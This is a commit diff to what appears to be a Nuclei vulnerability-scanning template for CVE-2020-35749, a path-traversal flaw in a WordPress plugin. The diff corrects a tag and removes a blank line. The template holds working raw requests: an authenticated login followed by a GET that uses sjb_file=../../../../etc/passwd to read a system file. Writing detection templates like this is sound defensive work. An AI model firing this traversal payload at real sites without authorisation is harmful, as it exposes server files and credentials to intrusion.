Update CVE-2020-35749.yaml

patch-1
Prince Chaddha 2022-02-09 00:13:40 +05:30 committed by GitHub
parent f29d2b20df
commit 8664885b45
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 4 deletions

View File

@ -13,7 +13,7 @@ info:
cvss-score: 7.7
cve-id: CVE-2020-35749
cwe-id: CWE-22
tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated
tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
@ -25,11 +25,9 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers: